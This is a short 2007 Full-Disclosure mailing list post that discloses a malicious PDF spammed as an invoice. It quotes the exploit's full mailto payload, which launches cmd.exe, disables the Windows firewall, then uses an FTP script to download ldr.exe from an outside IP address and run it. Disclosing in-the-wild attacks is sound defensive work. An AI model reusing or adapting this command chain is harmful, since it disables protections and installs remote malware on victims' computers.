[Full-disclosure] PDF mailto exploit in the wild
biz4rre at gmail.com
biz4rre at gmail.com
Tue Oct 23 18:51:12 BST 2007
yes, it try to open:
mailt0:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"
PS. mailt0 == mailto
PPS. ***king spammers
2007/10/23, Paul Szabo <psz at maths.usyd.edu.au>:
>
> In case you are interested... messages like the following were spammed
> to my users tonight.
>
> > Content-Transfer-Encoding: base64
> > Content-Disposition: attachment;
> > filename="INVOICE.pdf"
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071023/cf38d6e9/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.